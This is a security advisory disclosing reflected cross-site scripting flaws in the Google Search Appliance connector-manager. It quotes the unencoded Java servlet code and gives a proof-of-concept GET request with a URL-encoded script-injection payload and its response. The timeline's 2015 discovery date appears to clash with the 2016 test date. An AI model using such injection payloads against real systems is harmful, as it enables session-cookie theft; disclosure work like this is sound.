Multiple Cross Site Scripting Vulnerabilities ============================================= Researcher: Timo Schmid Description =========== The Google Search Appliance (GSA) provides a management interface to interact with the installed connectors for the data crawling. This management interface contains multiple reflected Cross Site Scripting (XSS) vulnerabilities, which can be used to harvest session cookies of the victim. This works also for services running on other ports (as for example the administrative console), as the cookie scope is not bound the service port. Exploitation Technique ====================== Remote Status ====== Reported Vulnerable Code Section ======================= projects/connector-manager/source/java/com/google/enterprise/connector/servlet/ServletUtil.java: [...] public static void writeMessageCode(PrintWriter out, ConnectorMessageCode status) { writeStatusId(out, status.getMessageId()); if (status.getMessage() != null && status.getMessage().length() > 1) { writeXMLElement( out, 1, ServletUtil.XMLTAG_STATUS_MESSAGE, status.getMessage()); } if (status.getParams() == null) { return; } for (int i = 0; i < status.getParams().length; ++i) { String param = status.getParams()[i].toString(); if (param == null || param.length() < 1) { continue; } out.println(indentStr(1) + "<" + XMLTAG_STATUS_PARAMS + " " + XMLTAG_STATUS_PARAM_ORDER + "=\"" + Integer.toString(i) + "\"" + " " + XMLTAG_STATUS_PARAM + "=\"" + param + "\"/>"); } } [...] Proof of Concept ================ Using the current version (99ed927) from the git repository: Request: GET /connector-manager/getConfigForm?ConnectorType=%22%2F%3E%3Chtml%3Ascript+xmlns%3Ahtml%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22%3Ealert%28%22XSS%22%29%3C%2Fhtml%3Ascript%3E%3Cfoo+a%3D%22 HTTP/1.1 Host: 192.168.48.2:8080 Connection: keep-alive User-Agent: python-requests/2.9.1 Accept-Encoding: gzip, deflate Accept: */* Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/xml;charset=UTF-8 Content-Length: 182 Date: Tue, 05 Jan 2016 14:46:39 GMT 5304 alert("XSS") Solution ======== The output of the servlets should be context based encoded. For the current situation, a XML attribute encoding is required for the params variable to prevent attacks. Affected Versions ================= >= git commit 51e438f9481308a3f91cd333e018fc654637d645 < git commit e3fdfdbd1303ea76b296793c8e9f0b3eac4602d8 Timeline ======== 2015-01-05: Vulnerabilities found 2015-01-05: GOOGLE informed 2016-01-07: Bugs confirmed 2016-03-03: Patches available at github References ========== [1] https://github.com/googlegsa/manager.v3/ [2] https://bufferoverflow.eu/BC-1503.txt [3] https://www.insinuator.net/2016/03/classical-web-vulns-found-in-google-search-appliance-7-4 Advisory-ID =========== BC-1503 Disclaimer ========== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/ distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.